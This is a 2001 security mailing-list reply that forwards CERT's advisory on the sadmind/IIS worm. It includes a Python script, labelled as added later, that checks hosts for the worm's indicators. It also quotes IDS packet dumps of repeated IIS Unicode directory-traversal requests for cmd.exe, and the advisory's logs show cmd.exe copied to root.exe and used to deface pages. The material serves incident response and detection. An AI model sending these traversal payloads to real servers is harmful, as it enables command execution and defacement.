Security Incidents mailing list archives
Re: 4 similar IIS attempts in a 48 hour period.
From: Frank Quinonez <fquinone () CISCO COM>
Date: Tue, 8 May 2001 10:06:51 -0700
you may want to check this out!
****************************************************
CERT Advisory CA-2001-11 sadmind/IIS Worm
Original release date: May 08, 2001
Last revised: --
Source: CERT/CC
A complete revision history is at the end of this file.
Systems Affected
* Systems running unpatched versions of Microsoft IIS
* Systems running unpatched versions of Solaris up to, and
including, Solaris 7
Overview
The CERT/CC has received reports of a new piece of self-propagating
malicious code (referred to here as the sadmind/IIS worm). The worm
uses two well-known vulnerabilities to compromise systems and deface
web pages.
I. Description
Based on preliminary analysis, the sadmind/IIS worm exploits a
vulnerability in Solaris systems and subsequently installs software to
attack Microsoft IIS web servers. In addition, it includes a component
to propagate itself automatically to other vulnerable Solaris systems.
It will add "+ +" to the .rhosts file in the root user's home
directory. Finally, it will modify the index.html on the host Solaris
system after compromising 2,000 IIS systems.
To compromise the Solaris systems, the worm takes advantage of a
two-year-old buffer overflow vulnerability in the Solstice sadmind
program. For more information on this vulnerability, see
http://www.kb.cert.org/vuls/id/28934
http://www.cert.org/advisories/CA-1999-16.html
After successfully compromising the Solaris systems, it uses a
seven-month-old vulnerability to compromise the IIS systems. For
additional information about this vulnerability, see
http://www.kb.cert.org/vuls/id/111677
Solaris systems that are successfully compromised via the worm exhibit
the following characteristics:
* Sample syslog entry from compromised Solaris system:
May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed
* A rootshell listening on TCP port 600
* Existence of the directories:
  * /dev/cub contains logs of compromised machines
  * /dev/cuc contains tools that the worm uses to operate and propagate
* Running processes of the scripts associated with the worm, such as
the following:
  * /bin/sh /dev/cuc/sadmin.sh
  * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
  * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
  * /bin/sh /dev/cuc/uniattack.sh
  * /bin/sh /dev/cuc/time.sh
  * /usr/sbin/inetd -s /tmp/.f
  * /bin/sleep 300
Microsoft IIS servers that are successfully compromised exhibit the
following characteristics:
* Modified web pages that read as follows:
fuck USA Government
fuck PoizonBOx
contact:sysadmcn () yahoo com cn
* Sample Log from Attacked IIS Server:
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/../../winnt/system32/cmd.exe \
/c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \
GET /scripts/root.exe /c+echo+\
<HTML code inserted here>.././index.asp 502 -
II. Impact
Solaris systems compromised by this worm are being used to scan and
compromise other Solaris and IIS systems. IIS systems compromised by
this worm can suffer modified web content.
Intruders can use the vulnerabilities exploited by this worm to
execute arbitrary code with root privileges on vulnerable Solaris
systems, and arbitrary commands with the privileges of the
IUSR_machinename account on vulnerable Windows systems.
We are receiving reports of other activity, including one report of
files being destroyed on the compromised Windows machine, rendering
them unbootable. It is unclear at this time if this activity is
directly related to this worm.
III. Solutions
Apply a patch from your vendor
A patch is available from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
For IIS Version 4:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
For IIS Version 5:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
Additional advice on securing IIS web servers is available from
http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/tools.asp
Apply a patch from Sun Microsystems as described in Sun Security
Bulletin #00191:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba
Appendix A. Vendor Information
Microsoft Corporation
The following documents regarding this vulnerability are available
from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS01-023.asp
Sun Microsystems
Sun has issued the following bulletin for this vulnerability:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba
References
1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable
to directory traversal via extended unicode in url (MS00-078)
http://www.kb.cert.org/vuls/id/111677
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice
AdminSuite Daemon sadmind
http://www.cert.org/advisories/CA-1999-16.html
Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter,
Art Manion, Ian Finlay, John Shaffer
______________________________________________________________________
This document is available from:
http://www.cert.org/advisories/CA-2001-11.html
______________________________________________________________________
CERT/CC Contact Information
Email: cert () cert org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more
information.
Getting security information
CERT publications and other security information are available from
our web site
http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins,
send email to majordomo () cert org. Please include in the body of your
message
subscribe cert-advisory
* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office.
______________________________________________________________________
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
_________________________________________________________________
Conditions for use, disclaimers, and sponsorship information
Copyright 2001 Carnegie Mellon University.
Revision History
May 08, 2001: Initial Release
--------------------------------------------------------------------
Frank Quinonez Cisco Systems 4 Venture St Suite 100
Systems Engineer || || Irvine, CA 92618
frankq () cisco com :||: :||: Phone: 949-788-5162
http://www.cisco.com ..:||||:..:||||:.. Pager: 800-365-4578
--------------------------------------------------------------------
Empowering the Internet Generation
Changing the way we Work, Live, Learn, and Play.
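The Solaris-side indicators the advisory lists (sadmind crashing under inetd, the /dev/cub and /dev/cuc directories, the worm's script processes, the root shell listening on TCP 600 and the "+ +" entry in root's .rhosts) can be checked mechanically against evidence pulled from a host. The script below is an added example, not part of the CERT advisory or of any CERT tooling: it matches those indicators against collected evidence and returns one finding per indicator. The syslog lines are the advisory's own sample; the ps -ef and netstat -an rows are constructed to look like Solaris output (netstat -an prints a listener as "*.600 ... LISTEN"), and the HostEvidence/triage names are this example's own.

```python
import re
from dataclasses import dataclass

# Indicators are the ones CA-2001-11 lists. The 'ps -ef' and 'netstat -an' rows
# below are constructed to look like Solaris output; the syslog lines are the
# advisory's own sample. Names (HostEvidence, triage) are this example's, not CERT's.
WORM_DIRS = ("/dev/cub", "/dev/cuc")
WORM_PROCESSES = (
    re.compile(r"/dev/cuc/(?:sadmin\.sh|uniattack\.sh|time\.sh|grabbb)\b"),
    re.compile(r"/usr/sbin/inetd\s+-s\s+/tmp/\.f\b"),   # second inetd reading the worm's config
)
SADMIND_CRASH = re.compile(
    r"inetd\[\d+\]: /usr/sbin/sadmind: (?:Bus Error|Segmentation Fault|Hangup|Killed)")
# Solaris 'netstat -an' prints a TCP listener as '*.600   *.*   ...   LISTEN'
ROOTSHELL_LISTENER = re.compile(r"^\s*(?:\*|[\d.]+)\.600\s.*\bLISTEN\b")


@dataclass
class HostEvidence:
    syslog: list          # lines from /var/adm/messages
    ps: list              # rows of 'ps -ef'
    netstat: list         # rows of 'netstat -an'
    paths_present: set    # paths that exist on the host
    root_rhosts: str      # contents of root's .rhosts ('' if absent)


def triage(ev: HostEvidence) -> list:
    """Return one finding per CA-2001-11 indicator present in the evidence."""
    findings = []
    crashes = sum(1 for line in ev.syslog if SADMIND_CRASH.search(line))
    if crashes:
        findings.append(f"sadmind crashed {crashes} times under inetd (overflow attempts)")
    for d in WORM_DIRS:
        if d in ev.paths_present:
            findings.append(f"worm directory present: {d}")
    for row in ev.ps:
        if any(p.search(row) for p in WORM_PROCESSES):
            # ps -ef has 8 columns; the last one is the full command line
            findings.append(f"worm process running: {row.split(None, 7)[-1]}")
    if any(ROOTSHELL_LISTENER.match(row) for row in ev.netstat):
        findings.append("listener on TCP port 600 (root shell)")
    if any(line.split() == ["+", "+"] for line in ev.root_rhosts.splitlines()):
        findings.append("root's .rhosts contains '+ +' (trusts any user from any host)")
    return findings


COMPROMISED = HostEvidence(
    syslog=[  # the advisory's sample, each entry on a single line
        "May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped",
        "May 7 02:40:01 carrier.domain.com last message repeated 1 time",
        "May 7 02:40:03 carrier.domain.com last message repeated 1 time",
        "May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped",
        "May 7 02:40:03 carrier.domain.com last message repeated 1 time",
        "May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped",
        "May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup",
        "May 7 02:40:08 carrier.domain.com last message repeated 1 time",
        "May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed",
    ],
    ps=[  # constructed rows carrying the command lines the advisory lists
        "    root   139     1  0 02:39:55 ?        0:00 /usr/sbin/inetd -s",
        "    root  4412     1  0 02:41:10 ?        0:00 /bin/sh /dev/cuc/sadmin.sh",
        "    root  4431  4412  0 02:41:12 ?        0:01 /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111",
        "    root  4440     1  0 02:41:15 ?        0:00 /usr/sbin/inetd -s /tmp/.f",
        "    root  4450  4412  0 02:41:20 ?        0:00 /bin/sleep 300",
    ],
    netstat=[  # constructed rows
        "      *.22                 *.*                0      0 24576      0 LISTEN",
        "      *.600                *.*                0      0 24576      0 LISTEN",
    ],
    paths_present={"/dev/cub", "/dev/cuc", "/dev/null"},
    root_rhosts="+ +\n",
)

CLEAN = HostEvidence(  # constructed: an untouched host
    syslog=["May 7 02:40:01 carrier.domain.com sendmail[200]: daemon started"],
    ps=["    root   139     1  0 02:39:55 ?        0:00 /usr/sbin/inetd -s"],
    netstat=["      *.22                 *.*                0      0 24576      0 LISTEN"],
    paths_present={"/dev/null"},
    root_rhosts="trusted.domain.com admin\n",
)

if __name__ == "__main__":
    for name, ev in (("compromised", COMPROMISED), ("clean", CLEAN)):
        print(name, "->", triage(ev) or "no indicators")
```

Note that "/bin/sleep 300" is deliberately not matched on its own: it is in the advisory's process list, but it is far too common to be an indicator without one of the /dev/cuc scripts alongside it.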
-----Original Message-----
From: Incidents Mailing List [mailto:INCIDENTS () SECURITYFOCUS COM]On
Behalf Of Steve Halligan
Sent: Tuesday, May 08, 2001 7:24 AM
To: INCIDENTS () SECURITYFOCUS COM
Subject: 4 similar IIS attempts in a 48 hour period.
I got these 4 attempts from different sources in a rather small window of
time. They all start out with a portscan of port 80, so I don't think it is
the same person (Why would they need to rescan each time?). You will note
that the order of the variation of the attempts is similar. Is this a new
worm? A new tool?
-Steve
----------------BEGIN SCAN REPORTS----------------------
*****************************SCAN #1*****************************************
----------------------------------------------------------------------------
--
#(1 - 2059) [2001-05-05 21:20:45] 305
IPv4: 207.51.58.7 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810
TCP: port=41385 -> dport: 80 flags=******S* seq=3959699664
ack=0 off=6 res=0 win=8760 urp=0 chksum=30305
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2081) [2001-05-06 12:06:16] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174
TCP: port=42384 -> dport: 80 flags=***AP*** seq=4087665554
ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2082) [2001-05-06 12:06:17] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168
TCP: port=42746 -> dport: 80 flags=***AP*** seq=4111537358
ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2083) [2001-05-06 12:06:18] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162
TCP: port=43046 -> dport: 80 flags=***AP*** seq=4129406045
ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2084) [2001-05-06 12:06:19] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156
TCP: port=44051 -> dport: 80 flags=***AP*** seq=4191243658
ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2085) [2001-05-06 12:06:20] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150
TCP: port=45036 -> dport: 80 flags=***AP*** seq=4254676574
ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2086) [2001-05-06 12:06:21] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144
TCP: port=45723 -> dport: 80 flags=***AP*** seq=3643186
ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2087) [2001-05-06 12:06:22] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138
TCP: port=46489 -> dport: 80 flags=***AP*** seq=54010263
ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2088) [2001-05-06 12:06:23] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132
TCP: port=47320 -> dport: 80 flags=***AP*** seq=104581118
ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2089) [2001-05-06 12:06:24] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126
TCP: port=48175 -> dport: 80 flags=***AP*** seq=160395667
ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2090) [2001-05-06 12:06:25] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117
TCP: port=49033 -> dport: 80 flags=***AP*** seq=213665368
ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432
Payload: length = 63
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2091) [2001-05-06 12:06:26] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108
TCP: port=49954 -> dport: 80 flags=***AP*** seq=270239886
ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899
Payload: length = 64
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/...
010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst
020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+
030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2092) [2001-05-06 12:06:27] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099
TCP: port=50870 -> dport: 80 flags=***AP*** seq=328007726
ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280
Payload: length = 65
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/...
010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys
020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c
030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0...
040 : 0A .
----------------------------------------------------------------------------
--
#(1 - 2093) [2001-05-06 12:06:28] 62
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090
TCP: port=51840 -> dport: 80 flags=***AP*** seq=378946693
ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453
Payload: length = 66
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/...
010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/
030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0..
040 : 0D 0A ..
----------------------------------------------------------------------------
--
#(1 - 2094) [2001-05-06 12:06:29] 56
IPv4: 207.51.58.7 -> 209.46.94.82
hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067
TCP: port=52623 -> dport: 80 flags=***AP*** seq=427404423
ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179
Payload: length = 77
000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0
010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8
020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3
030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir
040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0....
****************************SCAN #2*******************************************
----------------------------------------------------------------------------
--
#(1 - 2075) [2001-05-06 11:25:12] 317
IPv4: 207.78.143.235 -> 209.46.94.85
hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438
TCP: port=56344 -> dport: 80 flags=******S* seq=823530689
ack=0 off=6 res=0 win=8760 urp=0 chksum=50416
Options:
#1 - MSS len=4 data=05B40000
Payload: none
----------------------------------------------------------------------------
--
#(1 - 2121) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155
TCP: port=57118 -> dport: 80 flags=***AP*** seq=3412786496
ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2122) [2001-05-06 18:08:07] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149
TCP: port=57170 -> dport: 80 flags=***AP*** seq=3415977274
ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2123) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140
TCP: port=57326 -> dport: 80 flags=***AP*** seq=3426276033
ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2124) [2001-05-06 18:08:18] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135
TCP: port=64799 -> dport: 80 flags=***AP*** seq=3904402609
ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2125) [2001-05-06 18:08:28] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126
TCP: port=65302 -> dport: 80 flags=***AP*** seq=3936366689
ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2126) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120
TCP: port=39706 -> dport: 80 flags=***AP*** seq=107054918
ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2127) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114
TCP: port=39709 -> dport: 80 flags=***AP*** seq=107263367
ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274
Payload: length = 62
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di
030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
----------------------------------------------------------------------------
--
#(1 - 2128) [2001-05-06 18:08:29] 62
IPv4: 207.78.143.235 -> 209.46.94.82
